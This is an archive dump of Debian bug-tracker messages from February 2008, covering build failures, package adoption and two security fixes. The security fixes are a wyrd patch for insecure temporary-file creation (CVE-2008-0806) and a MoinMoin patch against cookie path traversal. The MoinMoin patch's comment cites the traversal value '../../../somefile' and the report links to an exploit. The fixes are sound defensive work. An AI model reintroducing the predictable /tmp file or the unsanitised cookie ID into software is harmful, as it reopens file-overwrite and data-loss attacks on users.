-I../../../../dist/include/exthandler -I../../../../dist/include/mailnews -I../../../../dist/include/msgdb -I../../../../dist/include/chardet -I../../../../dist/include/ipc -I../../../../dist/include/caps -I../../../../dist/include/mime -I../../../../dist/include/mimetype -I../../../../dist/include/xpconnect -I../../../../dist/include/pipnss -I../../../../dist/include/enigmime -I../../../../dist/include -I/usr/include/icedove/ -I/usr/include/icedove/xpcom/ -I/usr/include/icedove/necko/ -I/usr/include/icedove/mimetype/ -I/usr/include/icedove/xpcom_obsolete -I/usr/include/icedove/caps/ -I/usr/include/icedove/xpconnect -I/usr/include/icedove/js -I/usr/include/icedove/msgsmime/ -I/usr/include/icedove/msgcompose -I/usr/include/icedove/msgbase/ -I/usr/include/icedove/mailnews/ -I/usr/include/icedove/msgdb/ -I/usr/include/icedove/msgbaseutil -I/usr/include/icedove/mime/ -I/usr/include/icedove/uconv -I/usr/include/icedove/dom -I/usr/include/icedove/pref -I/usr/include/icedove/uriloader -I/usr/include/icedove/string -I/usr/include/nspr-I../../../../dist/sdk/include-fPIC -fno-rtti -fno-exceptions -Wall -Wconversion -Wpointer-arith -Wcast-align -Woverloaded-virtual -Wsynth -Wno-ctor-dtor-privacy -Wno-non-virtual-dtor -Wno-long-long -pedantic -fshort-wchar -pthread -pipe -DNDEBUG -DTRIMMED -O -DMOZILLA_CLIENT -include ../../../../mozilla-config.h -Wp,-MD,.deps/nsEnigModule.pp nsEnigModule.cpp ERROR: ld.so: object 'libfakeroot-sysv.so' from LD_PRELOAD cannot be preloaded: ignored. ERROR: ld.so: object 'libfakeroot-sysv.so' from LD_PRELOAD cannot be preloaded: ignored. ERROR: ld.so: object 'libfakeroot-sysv.so' from LD_PRELOAD cannot be preloaded: ignored. rm -f libenigmime.so ERROR: ld.so: object 'libfakeroot-sysv.so' from LD_PRELOAD cannot be preloaded: ignored. c++ -fno-rtti -fno-exceptions -Wall -Wconversion -Wpointer-arith -Wcast-align -Woverloaded-virtual -Wsynth -Wno-ctor-dtor-privacy -Wno-non-virtual-dtor -Wno-long-long -pedantic -fshort-wchar -pthread -pipe -DNDEBUG -DTRIMMED -O -fPIC -shared -Wl,-z,defs -Wl,-h,libenigmime.so -o libenigmime.so nsEnigModule.o -L/usr/lib/icedove -lxpcom -L/usr/lib -lplds4 -lplc4 -lnspr4 -lpthread -ldl -Wl,--whole-archive ../src/libenigmime_s.a ../ipc/src/libipc_s.a -Wl,--no-whole-archive -L../../../../dist/bin -L../../../../dist/lib -L../../../../dist/bin -lxpcom -lxpcom_core -L../../../../dist/lib -lxpcom_compat -L/usr/lib -lplds4 -lplc4 -lnspr4 -lpthread -ldl -Wl,--version-script -Wl,../../../../build/unix/gnu-ld-scripts/components-version-script -Wl,-Bsymbolic -ldl -lm ERROR: ld.so: object 'libfakeroot-sysv.so' from LD_PRELOAD cannot be preloaded: ignored. ERROR: ld.so: object 'libfakeroot-sysv.so' from LD_PRELOAD cannot be preloaded: ignored. ERROR: ld.so:
Bug#466382: intent to NMU
tags 466382 + patch
thanks
Hi,
after Julien Cristau told me there is an open_temp_file
function in Ocaml and a bit reading of the Ocaml documentation I
can come up with a patch.
It will be also archived on:
http://people.debian.org/~nion/nmu-diff/wyrd-1.4.3b-3_1.4.3b-3.1.patch
Kind regards
Nico
--
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
diff -u wyrd-1.4.3b/debian/patches/00list wyrd-1.4.3b/debian/patches/00list
--- wyrd-1.4.3b/debian/patches/00list
+++ wyrd-1.4.3b/debian/patches/00list
@@ -1,0 +2 @@
+02-CVE-2008-0806
diff -u wyrd-1.4.3b/debian/changelog wyrd-1.4.3b/debian/changelog
--- wyrd-1.4.3b/debian/changelog
+++ wyrd-1.4.3b/debian/changelog
@@ -1,3 +1,12 @@
+wyrd (1.4.3b-3.1) unstable; urgency=high
+
+ * Non-maintainer upload by security team.
+ * This update addresses the following issue:
+CVE-2008-0806: insecure temporary file creation that
+could lead to symlink attacks and thus data loss (Closes: #466382).
+
+ -- Nico Golde [EMAIL PROTECTED] Tue, 19 Feb 2008 22:28:12 +0100
+
wyrd (1.4.3b-3) unstable; urgency=low
* Fixed debian/watch file.
only in patch2:
unchanged:
--- wyrd-1.4.3b.orig/debian/patches/02-CVE-2008-0806.dpatch
+++ wyrd-1.4.3b/debian/patches/02-CVE-2008-0806.dpatch
@@ -0,0 +1,40 @@
+#! /bin/sh /usr/share/dpatch/dpatch-run
+## 02-CVE-2008-0806.dpatch by Nico Golde [EMAIL PROTECTED]
+##
+## All lines beginning with `## DP:' are a description of the patch.
+## DP: No description.
+
[EMAIL PROTECTED]@
+diff -urNad wyrd-1.4.3b~/interface_main.ml wyrd-1.4.3b/interface_main.ml
+--- wyrd-1.4.3b~/interface_main.ml 2007-08-20 03:24:26.0 +0200
wyrd-1.4.3b/interface_main.ml 2008-02-19 22:14:28.0 +0100
+@@ -1066,7 +1066,7 @@
+in
+Hashtbl.iter find_binding Rcfile.table_commandstr_command;
+let sorted_list = List.fast_sort Pervasives.compare !bindings in
+- let out_channel = open_out Rcfile.tmpfile in
++ let out_channel = Rcfile.tmpfd in
+List.iter (output_string out_channel) sorted_list;
+close_out out_channel;
+def_prog_mode ();
+@@ -1786,7 +1786,7 @@
+ let i = draw_msg iface in
+ handle_refresh i reminders
+ |Rcfile.Quit -
+- let new_iface = {iface with run_wyrd = false} in
++ Sys.remove Rcfile.tmpfile;let new_iface = {iface with run_wyrd = false} in
+ (new_iface, reminders)
+with Not_found -
+ let _ = beep () in
+diff -urNad wyrd-1.4.3b~/rcfile.ml wyrd-1.4.3b/rcfile.ml
+--- wyrd-1.4.3b~/rcfile.ml 2007-08-20 03:24:26.0 +0200
wyrd-1.4.3b/rcfile.ml 2008-02-19 22:13:21.0 +0100
+@@ -136,7 +136,7 @@
+ (* Final hash table that maps from object to color_pair index *)
+ let object_palette = Hashtbl.create 20
+
+-let tmpfile = /tmp/wyrd-tmp. ^ (string_of_int (Unix.getuid ()))
++let tmpfile,tmpfd = Filename.open_temp_file wyrd -temp
+
+
+ (* Turn colors on and off *)
pgpknUeK5AzEl.pgp
Description: PGP signature
Bug#464315: marked as done (libtemplates-parser: FTBFS: tail: cannot open `+3' for reading: No such file or directory)
Your message dated Tue, 19 Feb 2008 21:17:04 +
with message-id [EMAIL PROTECTED]
and subject line Bug#464315: fixed in libtemplates-parser 10.0+20060522-5.1
has caused the Debian Bug report #464315,
regarding libtemplates-parser: FTBFS: tail: cannot open `+3' for reading: No
such file or directory
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)
--
464315: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464315
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
---BeginMessage---
Package: libtemplates-parser
version: 10.0+20060522-5
Severity: serious
User: [EMAIL PROTECTED]
Usertags: qa-ftbfs-20080205 qa-ftbfs
Justification: FTBFS on i386
Hi,
During a rebuild of all packages in sid, your package failed to build on i386.
Relevant part:
make[1]: Entering directory
`/build/user/libtemplates-parser-10.0+20060522/docs'
tail +3 all_sources.ada sources.ada
tail: cannot open `+3' for reading: No such file or directory
make[1]: *** [demo.adb] Error 1
make[1]: Leaving directory
`/build/user/libtemplates-parser-10.0+20060522/docs'
make: *** [doc-stamp] Error 2
dpkg-buildpackage: failure: debian/rules build gave error exit status 2
The full build log is available from:
http://people.debian.org/~lucas/logs/2008/02/05
A list of current common problems and possible solutions is available at
http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute!
About the archive rebuild: The rebuild was done on about 50 AMD64 nodes
of the Grid'5000 platform, using a clean chroot containing a sid i386
environment. Internet was not accessible from the build systems.
--
| Lucas Nussbaum
| [EMAIL PROTECTED] http://www.lucas-nussbaum.net/ |
| jabber: [EMAIL PROTECTED] GPG: 1024D/023B3F4F |
---End Message---
---BeginMessage---
Source: libtemplates-parser
Source-Version: 10.0+20060522-5.1
We believe that the bug you reported is fixed in the latest version of
libtemplates-parser, which is due to be installed in the Debian FTP archive:
libtemplates-parser-dev_10.0+20060522-5.1_i386.deb
to
pool/main/libt/libtemplates-parser/libtemplates-parser-dev_10.0+20060522-5.1_i386.deb
libtemplates-parser10_10.0+20060522-5.1_i386.deb
to
pool/main/libt/libtemplates-parser/libtemplates-parser10_10.0+20060522-5.1_i386.deb
libtemplates-parser_10.0+20060522-5.1.diff.gz
to
pool/main/libt/libtemplates-parser/libtemplates-parser_10.0+20060522-5.1.diff.gz
libtemplates-parser_10.0+20060522-5.1.dsc
to
pool/main/libt/libtemplates-parser/libtemplates-parser_10.0+20060522-5.1.dsc
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Margarita Manterola [EMAIL PROTECTED] (supplier of updated
libtemplates-parser package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Format: 1.7
Date: Tue, 19 Feb 2008 18:05:52 +
Source: libtemplates-parser
Binary: libtemplates-parser-dev libtemplates-parser10
Architecture: source i386
Version: 10.0+20060522-5.1
Distribution: unstable
Urgency: low
Maintainer: Ludovic Brenta [EMAIL PROTECTED]
Changed-By: Margarita Manterola [EMAIL PROTECTED]
Description:
libtemplates-parser-dev - Ada library to parse files and replace variables
with their value
libtemplates-parser10 - Ada library to parse files and replace variables with
their value
Closes: 464315
Changes:
libtemplates-parser (10.0+20060522-5.1) unstable; urgency=low
.
* Non-maintainer upload to fix Failure To Build From Source.
* Added patches/fix-tail-call.patch to use the new standard in the
call to the tail command. Closes: #464315.
* Updated Standards-Version to 3.7.3:
- Changed {Source-Version} for {binary:Version} in the -dev dependency
* Fixed lintian warnings:
- Added Section: libs to the Source package
- Added 'compat' file with a value of 4, removed it from debian/rules
* debian/rules: added a rule in the clean target to remove the .pc
directory generated by quilt.
Files:
4e08829f27e77c912d6b018512668379 777 libs optional
libtemplates-parser_10.0+20060522-5.1.dsc
ab3de1c0cf6635a9474b92349cae058e 5411 libs optional
libtemplates-parser_10.0+20060522-5.1.diff.gz
dc69b2284a6aa840b8fc22cf5a87d2e7 808838
Bug#462984: marked as done (python-moinmoin: MOIN_ID cookie bug)
Your message dated Tue, 19 Feb 2008 21:02:13 +
with message-id [EMAIL PROTECTED]
and subject line Bug#462984: fixed in moin 1.5.8-5.1
has caused the Debian Bug report #462984,
regarding python-moinmoin: MOIN_ID cookie bug
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)
--
462984: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=462984
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
---BeginMessage---
Package: python-moinmoin
Version: 1.5.8-5
Severity: important
Tags: patch
Allows a malicious user to overwrite files via a bogus cookie. Should
the severety on this be grave?
Example exploit: http://www.milw0rm.com/exploits/4957
Here is the upstream patch, which can also be found at
http://hg.moinmo.in/moin/1.5/rev/e69a16b6e630 :
--- a/MoinMoin/user.py Sun Oct 08 15:06:37 2006 +0200
+++ b/MoinMoin/user.py Sun Jan 20 23:27:48 2008 +0100
@@ -6,7 +6,7 @@
@license: GNU GPL, see COPYING for details.
-import os, time, sha, codecs
+import os, time, sha, codecs, re
try:
import cPickle as pickle
@@ -19,6 +19,7 @@ from MoinMoin import config, caching, wi
from MoinMoin import config, caching, wikiutil
from MoinMoin.util import filesys, timefuncs
+USERID_re = re.compile(r'^\d+\.\d+(\.\d+)?$')
def getUserList(request):
Get a list of all (numerical) user IDs.
@@ -27,10 +28,9 @@ def getUserList(request):
@rtype: list
@return: all user IDs
-import re, dircache
-user_re = re.compile(r'^\d+\.\d+(\.\d+)?$')
+import dircache
files = dircache.listdir(request.cfg.user_dir)
-userlist = [f for f in files if user_re.match(f)]
+userlist = [f for f in files if USERID_re.match(f)]
return userlist
@@ -210,7 +210,7 @@ class User:
self._cfg = request.cfg
self.valid = 0
self.trusted = 0
-self.id = id
+self.id = self.id_sanitycheck(id)
self.auth_username = auth_username
self.auth_method = kw.get('auth_method', 'internal')
self.auth_attribs = kw.get('auth_attribs', ())
@@ -298,6 +298,15 @@ class User:
# use it reliably in edit locking
from random import randint
return %s.%d % (str(time.time()), randint(0,65535))
+
+def id_sanitycheck(self, id):
+ only return valid user IDs, avoid someone faking his cookie to
+contain '../../../somefile', breaking out of the data/user/
directory!
+
+if id and USERID_re.match(id):
+return id
+else:
+return None
def create_or_update(self, changed=False):
Create or update a user profile
-- System Information:
Debian Release: lenny/sid
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.22-1-686 (SMP w/1 CPU core)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Versions of packages python-moinmoin depends on:
ii moinmoin-common 1.5.8-5Python clone of WikiWiki - common
ii python2.4.4-6An interactive high-level object-o
ii python-support0.7.6 automated rebuilding support for p
Versions of packages python-moinmoin recommends:
ii exim4 4.69-1 meta-package to ease Exim MTA (v4)
ii exim4-daemon-light [mail-tran 4.69-1 lightweight Exim MTA (v4) daemon
-- no debconf information
--
BOFH excuse #345:
Having to manually track the satellite.
---End Message---
---BeginMessage---
Source: moin
Source-Version: 1.5.8-5.1
We believe that the bug you reported is fixed in the latest version of
moin, which is due to be installed in the Debian FTP archive:
moin_1.5.8-5.1.diff.gz
to pool/main/m/moin/moin_1.5.8-5.1.diff.gz
moin_1.5.8-5.1.dsc
to pool/main/m/moin/moin_1.5.8-5.1.dsc
moinmoin-common_1.5.8-5.1_all.deb
to pool/main/m/moin/moinmoin-common_1.5.8-5.1_all.deb
python-moinmoin_1.5.8-5.1_all.deb
to pool/main/m/moin/python-moinmoin_1.5.8-5.1_all.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Thomas Viehmann [EMAIL PROTECTED] (supplier of updated moin package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])
-BEGIN PGP SIGNED MESSAGE-
Hash:
Bug#465608: education-* installer is still screwing up!
reopen 465608 thanks Here is what I'm getting attempting to install 0.825. debian also refuses to remove 0.824. I sent a message to debian-user about this earlier today (attached) but have not gotten a reply yet. domus:/var/cache/apt/archives# dpkg -i education-chemistry_0.825_i386.deb (Reading database ... 580683 files and directories currently installed.) Preparing to replace education-chemistry 0.824+svn40294 (using education-chemistry_0.825_i386.deb) ... Unpacking replacement education-chemistry ... err 67: Custom distribution education does not exist dpkg: warning - old post-removal script returned error exit status 67 dpkg - trying script from the new package instead ... err 67: Custom distribution education does not exist dpkg: error processing education-chemistry_0.825_i386.deb (--install): subprocess new post-removal script returned error exit status 67 err 67: Custom distribution education does not exist dpkg: error while cleaning up: subprocess post-removal script returned error exit status 67 Errors were encountered while processing: education-chemistry_0.825_i386.deb ---BeginMessage--- Hi, I'm running sid. I've had the education packages installed for awhile... last week, an update came out for them which has completely broken the package manager, making it impossible to upgrade further. I get a message like this for every education-* package: Preparing to replace education-chemistry 0.824+svn40294 (using .../education-chemistry_0.825_i386.deb) ... Unpacking replacement education-chemistry ... err 67: Custom distribution education does not exist dpkg: warning - old post-removal script returned error exit status 67 dpkg - trying script from the new package instead ... err 67: Custom distribution education does not exist dpkg: error processing /var/cache/apt/archives/education-chemistry_0.825_i386.deb (--unpack): subprocess new post-removal script returned error exit status 67 err 67: Custom distribution education does not exist dpkg: error while cleaning up: subprocess post-removal script returned error exit status 67 ... apt-get remove refuses to delete the packages: Reading changelogs... Done dpkg: error processing education-chemistry (--remove): Package is in a very bad inconsistent state - you should reinstall it before attempting a removal. Errors were encountered while processing: education-chemistry E: Sub-process /usr/bin/dpkg returned an error code (1) ... and trying to force dpkg's hand doesnt work either! domus:~# dpkg --force-remove-reinstreq --purge education-chemistry dpkg - warning, overriding problem because --force enabled: Package is in a very bad inconsistent state - you should reinstall it before attempting a removal. (Reading database ... 580601 files and directories currently installed.) Removing education-chemistry ... err 67: Custom distribution education does not exist dpkg: error processing education-chemistry (--purge): subprocess post-removal script returned error exit status 67 Errors were encountered while processing: education-chemistry Is there any safe, sane way I can either remove these 50-some-odd packages or get them to install correctly? Thanks, Tyler -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] ---End Message---
Processed: education-* installer is still screwing up!
Processing commands for [EMAIL PROTECTED]: reopen 465608 Bug#465608: education-chemistry: fails to install: err 67: Custom distribution education does not exist 'reopen' may be inappropriate when a bug has been closed with a version; you may need to use 'found' to remove fixed versions. Bug#463838: education-astronomy doesn't install : missing directory Bug#465573: education-logic-games : broken package Bug reopened, originator not changed. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#446665: mercury: should this package be removed?
On Tue, Feb 19, 2008 at 03:27:37PM -0500, Barry deFreese wrote: Hi folks, Sorry for all of the CCs but all of you have expressed interest in fixing/adopting this package (with the exception of QA). Do any of you still have an interest and/or a plan to fix this package? According to the Mecury website, it is supposed to build with gcc-4.1 which would be a hell of a lot better than gcc-3.x. Is that not the case? This thing has been orphaned a while and has an RC bug over a year old. If no-one wants to fix it up, I will request removal within the week. If I can help with packaging or fixing this thing, please feel free to contact me and will gladly help if I can. Otherwise it's a goner. :-) Hi Barry. I'm interested in re-packaging this, however it's going to be one of those things that gets a small amount of attention here and there. I'm one of the Mercury developers, so I use and develop on Mercury day-to-day. The Mercury website should be considered correct, this package (in debian) is a very old version of Mercury and I'd like to release a newer package based on the current stable version, and also ensure I can produce .debs for the current CVS HEAD. There are several components to mercury that I'd like to package in seperate binary packages. These are: + Complier + Runtime and Standard Library + Other tools such as debuggers and profilers. Mercury also supports 'grades', this makes it different to other compliers and more interesting to package. Each grade represents a complier backend and some options. There are two C backends, a Java backend, and Erlang backend and a MSIL backend. Options can include optional garbage collection (as apposed to never reclaiming memory), profiling support, debugging support and more. I'd like to package the library and runtime for each grade. These can all be installed concurrently and won't conflict. This will mean that there may be 6-12 mercury-related packages. And since I haven't packaged for Debian before this is rather an ominous task. I intend to read plenty of documentation and seek the help of [EMAIL PROTECTED] as appropriate. I usually use the ROTD releases, however that's mostly because I'm working on Mercury it's self. It is probably useful to package a stable release and a ROTD, since we havn't made a release for a while. Unfortunatly I can't make any progress of when this will be done, and I'm not yet sure the best way to do it. Will removing the old package from Debian make it harder for me to get this one in? If so I'd like it left in Debian until I'm able to complete this. But since I want to package the new stable version instead removing it may not affect me. Ray Ward: I'd like to addopt this, may I? If you agree I'll change O to ITA and make myself the owner on bug #379682. I've also CC'ed the [EMAIL PROTECTED] mailing list. Thanks. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#446665: mercury: should this package be removed?
Paul Bone wrote: Hi Barry. I'm interested in re-packaging this, however it's going to be one of those things that gets a small amount of attention here and there. I'm one of the Mercury developers, so I use and develop on Mercury day-to-day. This will mean that there may be 6-12 mercury-related packages. And since I haven't packaged for Debian before this is rather an ominous task. I intend to read plenty of documentation and seek the help of [EMAIL PROTECTED] as appropriate. I'm in a similar position - not much time, and have never created a Debian package before. I was going to create one big package, but 6-12 makes more sense. I usually use the ROTD releases, however that's mostly because I'm working on Mercury it's self. It is probably useful to package a stable release and a ROTD, since we havn't made a release for a while. One of the reasons that the previous version never made it to stable was that was an ROTD, so I see using a ROTD only as a bit of a trap. Packaging both might be good though, but only have the release version go into Lenny. Unfortunatly I can't make any progress of when this will be done, and I'm not yet sure the best way to do it. Will removing the old package from Debian make it harder for me to get this one in? If so I'd like it left in Debian until I'm able to complete this. But since I want to package the new stable version instead removing it may not affect me. I was involved in discussions on this a while ago (when I put in the ITA) and my thought was to leave it in so the bug history etc. doesn't get removed (some it it is still relevant). Taking it over might also make it easier to get a sponsor if you are not a Debian dev. It would also be nice not to have another package grab the name. However the maintainers have the final say on that. Ray Ward: I'd like to addopt this, may I? If you agree I'll change O to ITA and make myself the owner on bug #379682. Absolutely, particularly as my ITA was quite some time ago, and I've still not managed to get a package ready. It sounds like we are in similar positions time and experience wise, and you have the advantage of being a developer - I've only been a user for a few years. My main interest is to see that a reasonably recent Mercury package gets into Debian. With what limited time I've got, I'm also happy to help in any way I can. Cheers, Roy Ward. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#461753: marked as done (iscsitarget-source: Fails to build for 2.6.24-1)
Your message dated Tue, 19 Feb 2008 23:32:03 + with message-id [EMAIL PROTECTED] and subject line Bug#461753: fixed in iscsitarget 0.4.15+svn148-1 has caused the Debian Bug report #461753, regarding iscsitarget-source: Fails to build for 2.6.24-1 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 461753: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=461753 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: iscsitarget-source Version: 0.4.15+svn145-1 Severity: important Hi maintainer(s), iscsitarget-source fails to build with 2.6.24-rc8 from the kernel snapshot archive [1]. | make: Entering directory `/usr/src/linux-headers-2.6.24-rc8-486' | LD /usr/src/modules/iscsitarget/kernel/built-in.o | CC [M] /usr/src/modules/iscsitarget/kernel/tio.o | CC [M] /usr/src/modules/iscsitarget/kernel/iscsi.o | CC [M] /usr/src/modules/iscsitarget/kernel/nthread.o | CC [M] /usr/src/modules/iscsitarget/kernel/wthread.o | CC [M] /usr/src/modules/iscsitarget/kernel/config.o | CC [M] /usr/src/modules/iscsitarget/kernel/digest.o | /usr/src/modules/iscsitarget/kernel/digest.c: In function 'digest_header': | /usr/src/modules/iscsitarget/kernel/digest.c:177: error: 'struct scatterlist' has no member named 'page' | /usr/src/modules/iscsitarget/kernel/digest.c:179: error: 'struct scatterlist' has no member named 'page' | /usr/src/modules/iscsitarget/kernel/digest.c: In function 'digest_data': | /usr/src/modules/iscsitarget/kernel/digest.c:231: error: 'struct scatterlist' has no member named 'page' | make[2]: *** [/usr/src/modules/iscsitarget/kernel/digest.o] Error 1 | make[1]: *** [/usr/src/modules/iscsitarget/kernel] Error 2 | make: *** [_module_/usr/src/modules/iscsitarget] Error 2 | make: Leaving directory `/usr/src/linux-headers-2.6.24-rc8-486' It would be great if you could fix this soon as iscsitarget is included in linux-modules-extra-2.6, so it would be good to have it work once 2.6.24 finals hits the archive. Max -- [1] http://kernel-archive.buildserver.net, see also http://wiki.debian.org/DebianKernel for more information. ---End Message--- ---BeginMessage--- Source: iscsitarget Source-Version: 0.4.15+svn148-1 We believe that the bug you reported is fixed in the latest version of iscsitarget, which is due to be installed in the Debian FTP archive: iscsitarget-source_0.4.15+svn148-1_all.deb to pool/main/i/iscsitarget/iscsitarget-source_0.4.15+svn148-1_all.deb iscsitarget_0.4.15+svn148-1.diff.gz to pool/main/i/iscsitarget/iscsitarget_0.4.15+svn148-1.diff.gz iscsitarget_0.4.15+svn148-1.dsc to pool/main/i/iscsitarget/iscsitarget_0.4.15+svn148-1.dsc iscsitarget_0.4.15+svn148-1_amd64.deb to pool/main/i/iscsitarget/iscsitarget_0.4.15+svn148-1_amd64.deb iscsitarget_0.4.15+svn148.orig.tar.gz to pool/main/i/iscsitarget/iscsitarget_0.4.15+svn148.orig.tar.gz A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Frederik Schüler [EMAIL PROTECTED] (supplier of updated iscsitarget package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.7 Date: Tue, 19 Feb 2008 20:52:01 +0100 Source: iscsitarget Binary: iscsitarget iscsitarget-source Architecture: source amd64 all Version: 0.4.15+svn148-1 Distribution: unstable Urgency: low Maintainer: Philipp Hug [EMAIL PROTECTED] Changed-By: Frederik Schüler [EMAIL PROTECTED] Description: iscsitarget - iSCSI Enterprise Target userland tools iscsitarget-source - iSCSI Enterprise Target kernel module source Closes: 461753 464993 Changes: iscsitarget (0.4.15+svn148-1) unstable; urgency=low . * New upstream snapshot. - Adds support for 2.6.24 kernels. (Closes: #461753) * Fix bashism in initscript.(Closes: #464993) Files: c23defe0001ef3d46ef1acefdd13ab30 725 net optional iscsitarget_0.4.15+svn148-1.dsc c3ea91848e690302690a61a3548efcbe 103436 net optional iscsitarget_0.4.15+svn148.orig.tar.gz ee85fdb342eef809b2c0df72daed25fe 5470 net optional iscsitarget_0.4.15+svn148-1.diff.gz 5c5e59f367ca0c35eb50d05cc896c70d 59198 net optional iscsitarget_0.4.15+svn148-1_amd64.deb 398c934d4ff2540dedd0a7e28b04fbb5 40822 net optional
Bug#466623: mysql-query-browser: ui locks up when selecting default schema
Package: mysql-query-browser Version: 5.0~rc12-2 Severity: grave Tags: patch Justification: renders package unusable mysql-query-browser starts fine but whenever I select an schema the UI locks up and the CPU temperature starts increasing. No matter how I select the schema, either clicking on the schema browser, or by 'USE foo', or by File/Select schema in menu locks the UI. I was digging upstream bugs and found 32293[1]. There is a patch[2] that seems to solve the problem. Regards, maykel [1] http://bugs.mysql.com/bug.php?id=32293 [2] https://bugzilla.redhat.com/attachment.cgi?id=218451 -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.24-1-686 (SMP w/1 CPU core) Locale: LANG=es_ES.UTF-8, LC_CTYPE=es_ES.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages mysql-query-browser depends on: ii libart-2.0-22.3.20-1 Library of functions for 2D graphi ii libatk1.0-0 1.20.0-1 The ATK accessibility toolkit ii libbonobo2-02.20.3-1 Bonobo CORBA interfaces library ii libbonoboui2-0 2.20.0-1 The Bonobo UI library ii libc6 2.7-4GNU C Library: Shared libraries ii libcairo2 1.5.8-1 The Cairo 2D vector graphics libra ii libcairomm-1.0-11.4.6-1 C++ wrappers for Cairo (shared lib ii libfontconfig1 2.5.0-2 generic font configuration library ii libgcc1 1:4.2.2-3GCC support library ii libgconf2-4 2.20.1-1 GNOME configuration database syste ii libglade2-0 1:2.6.2-1library to load .glade files at ru ii libglib2.0-02.15.5-1 The GLib library of C routines ii libglibmm-2.4-1c2a 2.14.2-4 C++ wrapper for the GLib toolkit ( ii libgnome-keyring0 2.20.3-1 GNOME keyring services library ii libgnome2-0 2.20.1.1-1 The GNOME 2 library - runtime file ii libgnomecanvas2-0 2.20.1-1 A powerful object-oriented display ii libgnomeprint2.2-0 2.18.2-1 The GNOME 2.2 print architecture - ii libgnomeprintui2.2-02.18.2-1 GNOME 2.2 print architecture User ii libgnomeui-02.20.1.1-1 The GNOME 2 libraries (User Interf ii libgnomevfs2-0 1:2.20.1-1 GNOME Virtual File System (runtime ii libgtk2.0-0 2.12.8-1 The GTK+ graphical user interface ii libgtkhtml3.8-153.12.3-2 HTML rendering/editing library - r ii libgtkmm-2.4-1c2a 1:2.12.3-1 C++ wrappers for GTK+ 2.4 (shared ii libice6 2:1.0.4-1X11 Inter-Client Exchange library ii libmysqlclient15off 5.0.51-1 MySQL database client library ii liborbit2 1:2.14.10-0.1libraries for ORBit2 - a CORBA ORB ii libpango1.0-0 1.19.3-1 Layout and rendering of internatio ii libpcre37.6-1Perl 5 Compatible Regular Expressi ii libpopt01.10-3 lib for parsing cmdline parameters ii libsigc++-2.0-0c2a 2.0.17-2 type-safe Signal Framework for C++ ii libsm6 2:1.0.3-1+b1 X11 Session Management library ii libstdc++6 4.2.2-3 The GNU Standard C++ Library v3 ii libx11-62:1.1.3-1X11 client-side library ii libxcursor1 1:1.1.9-1X cursor management library ii libxext61:1.0.3-2X11 miscellaneous extension librar ii libxfixes3 1:4.0.3-2X11 miscellaneous 'fixes' extensio ii libxi6 2:1.1.3-1X11 Input extension library ii libxinerama11:1.0.2-1X11 Xinerama extension library ii libxml2 2.6.31.dfsg-1GNOME XML library ii libxrandr2 2:1.2.2-1X11 RandR extension library ii libxrender1 1:0.9.4-1X Rendering Extension client libra ii mysql-gui-tools-common 5.0~rc12-2 Architecture independent files for ii zlib1g 1:1.2.3.3.dfsg-8 compression library - runtime mysql-query-browser recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466624: libtest-exception-perl: FTBFS: Test failures
Package: libtest-exception-perl
Version: 0.25-1
Severity: serious
